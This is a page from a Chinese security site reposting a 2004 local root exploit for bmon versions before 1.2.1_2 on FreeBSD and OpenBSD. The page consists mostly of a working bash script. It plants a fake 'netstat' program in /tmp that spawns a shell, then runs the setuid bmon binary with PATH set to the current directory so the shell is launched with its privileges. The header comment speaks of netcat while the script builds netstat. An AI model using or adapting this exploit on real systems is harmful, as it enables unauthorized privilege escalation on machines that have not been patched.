首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
bmon < 1.2.1_2 local exploit
来源:www.bk.ru 作者:Idan 发布时间:2004-10-19  

bmon < 1.2.1_2 local exploit


#!/usr/local/bin/bash

# Written by Idan Nahoum. idanna@bk.ru
# local exploit for FreeBSD/OpenBSD with bmon < 1.2.1_2 installed.
# when bmon is executed with the -n parameter it popen()s netcat
# but fail to provide an absoluth path.
# some bsds are configured with acls that doesnt allow setuid files to
# run except those that are explicity allowed, so creating a file called
# netcat that chmod's +s bash wouldnt work, bash needs to run directly by
# bmon which uses ncurses, so to get a useable shell we need to redirect
# stdout to stderr (stdout is closed), and restore the stty settings.
# http://www.vuxml.org/freebsd/938f357c-16dd-11d9-bc4a-000c41e2cdad.html

declare -r SPATH="${PATH}"
declare -r STTY_EXEC=$(which stty)
declare -r STTY_SETTINGS=$(${STTY_EXEC} -g)
declare -r QSHELL="/usr/local/bin/bash"
declare BMON_EXEC="/usr/local/sbin/bmon"

echo "$0 [default: ${BMON_EXEC}]"

[ "$#" -gt "0" ] && BMON_EXEC="${1}"

[ -x "${BMON_EXEC}" ] ||
{
echo "${BMON_EXEC} not found"
exit
}

cd /tmp

# apparently bmon closes stdout, so we run a shell with stdout redirected
# to stderr.

cat > ./netstat <<EOF
${STTY_EXEC} ${STTY_SETTINGS}
PATH=${SPATH} /bin/sh 1>&2
EOF

/bin/chmod 755 ./netstat
echo "trying to exploit"
PATH=./ "${BMON_EXEC}" -n



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows NNTP Service XPAT comm
·Writing Trojans that Bypass Wi
·Microsoft Internet Explorer远
·ProFTPd remote users discovery
·remote Icecast 2.0.1 for windo
·NetBSD/FreeBSD移植的Systrace E
·ICECast Remote Code Execution
·Linksys BOOTP Memory Leak Expl
·Proof of Concept local RetLibc
·Condition Vulnerability Allows
·IPSWITCH WhatsUp Gold 8.03 Rem
·BNBT BitTorrent Tracker DoS Ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved